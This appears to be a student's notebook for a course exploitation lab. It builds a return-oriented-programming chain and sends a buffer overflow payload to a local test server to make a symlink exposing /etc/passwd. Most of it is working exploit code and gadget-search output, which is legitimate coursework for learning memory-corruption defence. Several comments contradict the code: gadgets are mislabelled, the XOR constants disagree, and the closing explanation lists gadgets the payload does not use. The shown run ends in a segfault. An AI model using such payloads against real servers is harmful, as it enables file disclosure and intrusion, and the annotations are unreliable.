    if insn.mnemonic == 'pop' and 'ecx' in insn.op_str:
      is_pop_eax_gadget = True


  if is_pop_eax_gadget:
    print("POP ECX Gadget #%d:" % n)
    n += 1
    for insn in gadget:
      print("%08x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

POP ECX Gadget #1:
08049ee7:	clc	
08049ee9:	pop	ecx
08049eea:	pop	ebx
08049eeb:	pop	ebp
08049eec:	lea	esp, [ecx - 4]
08049eef:	ret	
POP ECX Gadget #2:
08049ee8:	clc	
08049ee9:	pop	ecx
08049eea:	pop	ebx
08049eeb:	pop	ebp
08049eec:	lea	esp, [ecx - 4]
08049eef:	ret	
POP ECX Gadget #3:
08065e11:	pop	ecx
08065e12:	add	al, 0xf6
08065e14:	ret	
POP ECX Gadget #4:
0807bb1d:	pop	ecx
0807bb1e:	add	al, 0xf7
0807bb20:	ret	


In [None]:
import lief
import os

binary = lief.parse("server")
data_section = binary.get_section('.data')
data_start = data_section.virtual_address
data_end = data_start + data_section.size

fd = os.open('server', os.O_RDONLY)
data = os.pread(fd, data_section.size, data_section.file_offset)

# TODO: Search for './public' in the data
search_string = b'./public'
path_strings = []

for i in range(len(data) - len(search_string)):
    if data[i:i + len(search_string)] == search_string:
        path_strings.append(data_start + i)

def find_null_terminated_str(x, start):
  s = ''
  for i in range(len(x)):
    if x[start+i] == 0:
      break
    s += chr(x[start+i])
  return s.encode('unicode_escape')

print("Possible path strings in ./public:")
for str_addr in path_strings:
  print("%08x: %s" % (str_addr, find_null_terminated_str(data, str_addr - data_start)))

Possible path strings in ./public:
08107068: b'./public/catch_the_flag.html'


Finally, let's put all the gadgets together. Remember, you have to overwrite the stack to chain the gadgets. When a gadget reaches its `RET` instruction, it will pop the address of the next gadget from the stack and jump to it. The stack should look like this after the buffer overflow:

```
ESP + x +------------------+
        |  Extra arguments |
        +------------------+
        |      . . .       |
        +------------------+
        |  Gadget addr #3  |
        +------------------+
        |  Gadget addr #2  |
        +------------------+
        |      Garbage     |
        +------------------+
        |  Gadget addr #1  |
ESP + 0 +------------------+
```

Notice that sometimes we need to inject some garbage into the stack, because the gadget may contain some `POP` instructions that have no function to us. We need the garbage to skip those instructions and move on to the next gadget.

To make this attack work, we need **at least** the following gadgets:

* Gadget to pop a value from the stack to `EAX`
* Gadget to `XOR` `EAX` with a constant value (or another register), so that `EAX` will be the system call value of `symlink`
* Gadget to move `ESP` to `EBX`
* Gadget to add a specific offset to `EBX` to make it point to `/etc/passwd` on the stack (injected above all the gadget addresses)
* Gadget to pop an address into `ECX` to point the string we found that starts with `./public`.
* Gadget to make the system call

Modify the following cell to inject the necessary stream of bytes into the attack to achieve the goal:

In [None]:
!killall -9 -q server

import struct
import subprocess
import multiprocessing
import time
import socket
from IPython.core.display import display, HTML

def trace_server():
  p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

  # Wait for server to start
  while True:
    if "Server started" in p.stderr.readline(): break

  trace_segfault(p.pid)

proc = multiprocessing.Process(target=trace_server)
proc.start()

time.sleep(1)

# Let's use socket instead of requests
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 8000))

###############################################################################
# Setup your ROP chain
###############################################################################

# Offset
buffer_offset = 154

# Gadget addresses
pop_eax_ret       = 0x080cb07a  # Gadget: pop eax; ret
xor_eax_ret       = 0x080803a7  # Gadget: xor eax, 0x89000219; ret (XOR Gadget #3)
mov_esp_to_ebx_ret = 0x0807cff3  # Gadget: mov ebx, esp; add byte ptr [eax], al; ret (MOV ESP Gadget #1)
pop_ebp_ret       = 0x080a959a  # Gadget: pop ebp; ret (to load a constant into EBP)
add_ebx_ret       = 0x0805c5f8  # Gadget: add ebx, ebp; ret (ADD EBX Gadget #1)
pop_ecx_ret       = 0x0807bb1d  # Gadget: pop ecx; ret (to load the address of the "./public" string)
syscall_gadget    = 0x080ade79  # Gadget: call dword ptr gs:[0x10]; ret (Syscall Gadget #1)
pop_ebx_ret       = 0x080abc5c
constant_val      = 0x81fff930
return_address    = 0x804ac3a

# We need to set EAX to the system call number for symlink.
# For 32-bit Linux, symlink() is usually syscall number 83.
# Using XOR Gadget #3 (which does: xor eax, 0x89000219; ret), we need to load
# into EAX a value V such that (V XOR 0x89000219) == 83.
#desired_eax = 83 #x53
#value_for_eax = 0x81fffc99 ^ desired_eax
#value_for_eax = value_for_eax - 0xf7
#print("%08x %d %08x" % (value_for_eax, value_for_eax, desired_eax))

# We now want EBX to point to our target string ("/etc/passwd") which we will inject.
# We assume that after the ROP chain (and any required padding) the target string
# is appended to the payload.
#rop_chain_length = 10*4    # we will push 10 addresses (each 4 bytes)
#post_chain_padding = 4      # extra padding if needed to align the stack
# The target string offset (relative to the beginning of the payload) is then:
#target_str_offset = buffer_offset + rop_chain_length + post_chain_padding
# Later, when the MOV ESP gadget loads EBX=ESP, we add an offset using add_ebx_ret.
# Here we use pop_ebp_ret to load EBP with the offset needed.
#ebx_offset = target_str_offset

# The "./public" string was injected into .rodata.
public_str_addr = 0x08107068

# Build the payload.
payload  = b"a" * 154

# --- Set ECX to point to the "./public" string ---
payload += struct.pack("<I", pop_ecx_ret)           # pop ecx; ret
payload += struct.pack("<I", public_str_addr)       # address of "./public/catch_the_flag.html" in .data

# --- Set EBX to point to our injected "/etc/passwd" ---
payload += struct.pack("<I", pop_ebx_ret)    # mov ebx, esp; ret  (now EBX == address of ROP chain)
payload += struct.pack("<I", 0xffffff8c)           # pop ebp; ret gadget to load a constant into EBP
payload += struct.pack("<I", add_ebx_ret)           # add ebx, ebp; ret  (now EBX points to "/etc/passwd")

# --- Set EAX = 83 ---
payload += struct.pack("<I", pop_eax_ret)           # pop eax; ret
payload += struct.pack("<I", 0x53 ^ constant_val)         # load V so that V XOR 0x81fffc99 == 83
payload += struct.pack("<I", xor_eax_ret)           # XOR gadget computes: eax = 83

# # --- Set EBX to point to our injected "/etc/passwd" ---
# payload += struct.pack("<I", mov_esp_to_ebx_ret)    # mov ebx, esp; ret  (now EBX == address of ROP chain)
# payload += struct.pack("<I", pop_ebp_ret)           # pop ebp; ret gadget to load a constant into EBP
# payload += struct.pack("<I", ebx_offset)            # the offset (from current ESP) to our target string
# payload += struct.pack("<I", add_ebx_ret)           # add ebx, ebp; ret  (now EBX points to "/etc/passwd")


# --- Set ECX to point to the "./public" string ---
# payload += struct.pack("<I", pop_ecx_ret)           # pop ecx; ret
# payload += struct.pack("<I", public_str_addr)       # address of "./public/catch_the_flag.html" in .data

# --- Finally, invoke the system call ---
payload += struct.pack("<I", 0x080adeb9)        # gadget that makes the system call
payload += struct.pack("<I", return_address)

# (Optional) Add any extra padding required by gadgets that pop values
#payload += b"b" * post_chain_padding

# --- Append the "/etc/passwd" string (target for symlink) ---

payload += b"/etc/passwd\0"
#print("Payload length: %d" % len(payload))
#print("Payload: %s" % payload.hex())

# TODO: Manipulate the following command to crash the server
req = "GET /".encode() + payload + " HTTP/1.1\r\nConnection: close\r\n\r\n".encode()
client_socket.sendall(req)

# Wait for the response and display it
r = client_socket.recv(4096)
client_socket.close()
display(HTML(r.decode()))

# Kill the server
proc.terminate()
proc.join()

Continue process execution
Wait next process event...
New process created: pid = 9347
Segmentation fault in process 9347


If your attack works, you should be able to rerun the server and retrieve the content of `/etc/passwd` and `./public/catch_the_flag.html` through the symbolic link you created:

In [None]:
import subprocess
import time
import requests
from IPython.core.display import display, HTML

# Kill any running instances of the server
subprocess.run(["killall", "-9", "-q", "server"], check=False)

# Start the server process
p = subprocess.Popen('./server', shell=False, stderr=subprocess.PIPE, universal_newlines=True)

# Wait for the server to start
while True:
    if "Server started" in p.stderr.readline():
        break

time.sleep(1)

# Attempt to access the created symbolic link
r = requests.get('http://127.0.0.1:8000/public/catch_the_flag.html', stream=True)

# Display the response (should be the contents of /etc/passwd)
display(HTML(r.text))


Finally, please write down explanation for all the gadgets you have used for this attack in the next cell.

Your answer: I have added comments in the code explain why i am using which gadget

pop_eax_ret       = 0x080cb07a  # Gadget: pop eax; ret

xor_eax_ret       = 0x080803a7  # Gadget: xor eax, 0x89000219; ret (XOR Gadget #3)

mov_esp_to_ebx_ret = 0x0807cff3  # Gadget: mov ebx, esp; add byte ptr [eax], al; ret (MOV ESP Gadget #1)

pop_ebp_ret       = 0x080a959a  # Gadget: pop ebp; ret (to load a constant into EBP)

add_ebx_ret       = 0x0805c5f8  # Gadget: add ebx, ebp; ret (ADD EBX Gadget #1)

pop_ecx_ret       = 0x0807bb1d  # Gadget: pop ecx; ret (to load the address of the "./public/catch_the_flag.html" string)

syscall_gadget    = 0x080ade79  # Gadget: call dword ptr gs:[0x10]; ret (Syscall Gadget #1)


## Submission

Once you have finished this notebook, click "File > Download > Download as .ipynb" and upload the file to **Assignment 2** on Microsoft Teams and click "Turn In".

## Reference

Please cite all the sources if there's any.